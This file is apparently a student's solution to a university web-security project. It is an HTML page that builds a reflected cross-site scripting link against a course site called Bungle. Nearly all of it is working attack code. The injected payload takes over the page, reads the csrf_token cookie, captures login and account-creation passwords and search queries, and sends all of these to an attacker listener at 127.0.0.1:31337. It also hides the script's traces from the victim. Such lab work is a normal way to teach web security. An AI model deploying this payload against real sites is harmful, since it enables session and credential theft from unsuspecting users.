<script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></

1. <script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
2. <script>
3.  
4. function payload(attacker) {
5. function log(data) {
6. console.log($.param(data))
7. $.get(attacker, data);
8. }
9. function proxy(href) {
10. $("html").load(href, function(){
11. $("html").show();
12. if (href.includes("search?")){
13.         for(var i=0; i<document.getElementsByTagName('a').length;i++){
14.             if (document.getElementsByTagName('a')[i].href.includes('script')){
15.                 document.getElementsByTagName('a')[i].style.display='none';}}
16.     }
17. var x= encodeURIComponent(document.cookie);var y= x.split('%3B%20');
18.     for(var i=0; i<y.length; i++){if(y[i].split('%3D')[0]=='csrf_token')
19.     {
20.         var token_cookie=y[i].split('%3D')[1];
21.     }
22.     }
23. var token= encodeURIComponent(token_cookie);
24. var attacker = "http://127.0.0.1:31337/";
25. $.get(attacker, "The csrf_token: "+token);
26. history.pushState(null, null, href);
27. var old=window.location.href;
28. window.onpopstate = function(event) {if(old!=window.location.href){proxy(window.location.href)}}
29. function home(){
30.  
31.      $.get(attacker, "The user is going to home");
32.     proxy("./");
33.     }
34.     function search(){
35.  
36.         var q=document.getElementById('query').value;
37.         $.get(attacker, "The user is searching: "+q);
38.         proxy("./search?q="+q);
39.        
40.     }
41.      function login(){
42.          var username=document.getElementById('username').value;
43.          var password=document.getElementById('userpass').value;
44.          
45.             $.ajax({
46.       type: 'POST',
47.       url: 'http://cs558web.bu.edu/project2/login',
48.       crossDomain: true,
49.       data: {csrf_token:token,username: username, password: password },
50.       cache: false,
51.       success: function(data) {
52.  
53.       }
54.     });
55.          $.get(attacker, "The user is logged in with username: "+username+"and password: "+password);
56.         proxy("./");
57.        
58.     }
59.       function logout(){
60.         $.get(attacker, "The user is loging out");
61.           $.ajax({
62.       type: 'POST',
63.       url: 'http://cs558web.bu.edu/project2/logout',
64.       crossDomain: true,
65.       data: {csrf_token:token},
66.       cache: false,
67.       success: function(data) {
68.             proxy("./");
69.  
70.       }
71.     });
72.  
73.     }
74.      function create(){
75.         var username=document.getElementById('username').value;
76.         var password=document.getElementById('userpass').value;
77.         $.post('http://cs558web.bu.edu/project2/create', { username: username, password: password } );
78.          $.get(attacker, "The user is creating a user with username: "+username+"and password: "+password);
79.  
80.         proxy("./");
81.     }
82.     if (href.includes("search?")==false){
83.     if(document.getElementById('log-out-btn')==null){  
84.         document.getElementsByTagName('form')[2].replaceWith('');
85.          document.getElementsByTagName('div')[12].innerHTML='<span class="form-inline"><p>Log in or create an account.</p><div class="form-group form-space"><input id="username" name="username" type="text" placeholder="Username" required class="form-control"></div><div class="form-group form-space"><input id="userpass" name="password" type="password" placeholder="Password" required class="form-control"></div><div class="form-group form-more-space"><button id="log-in-btn" class="btn btn-default">Login</button><button id="new-account-btn" class="btn btn-default">Create Account</button></div></span>'
86.         }
87.     }
88.     if(document.getElementById('search-again-btn')!=null){
89.     document.getElementById('search-again-btn').removeAttribute('href');
90.     document.getElementById('search-again-btn').addEventListener('click', function() {home();}); }
91.     if(document.getElementById('bungle-lnk')!=null){
92.     document.getElementById('bungle-lnk').removeAttribute('href');
93.     document.getElementById('bungle-lnk').addEventListener('click', function() {home();})}
94.     if(document.getElementById('log-out-btn')!=null){                                    
95.     document.getElementById('log-out-btn').type = '#';
96.     document.getElementById('log-out-btn').addEventListener('click', function() {logout();});}
97.     if(document.getElementById('search-btn')!=null){
98.     document.getElementById('search-btn').type = '#';
99.     document.getElementById('search-btn').addEventListener('click', function() {search();});}
100.     if(document.getElementById('log-in-btn')!=null){
101.     document.getElementById('log-in-btn').addEventListener('click', function() {login();});}
102.     if(document.getElementById('new-account-btn')!=null){
103.     document.getElementById('new-account-btn').addEventListener('click', function() {create();});
104.                                          }
105. });
106. }
107. $("html").hide();
108. proxy("./");
109. }
110.    
111.    
112. function makeLink(xssdefense, target, attacker) {
113. if (xssdefense == 0) {
114. return target + "./search?xssdefense=" + xssdefense.toString() + "&q=" +
115. encodeURIComponent("<script" + ">" + payload.toString() +
116. ";payload(\"" + attacker + "\");</script" + ">");
117. } else {
118. // Implement code to defeat XSS defenses here.
119. }
120. }
121. var xssdefense = 0;
122. var target = "http://cs558web.bu.edu/project2/";
123. var attacker = "http://127.0.0.1:31337/";
124. $(function() {
125. var url = makeLink(xssdefense, target, attacker);
126. $("h3").html("<a target=\"run\" href=\"" + url + "\">Try Bungle!</a>");
127. });
128. </script> <h3></h3>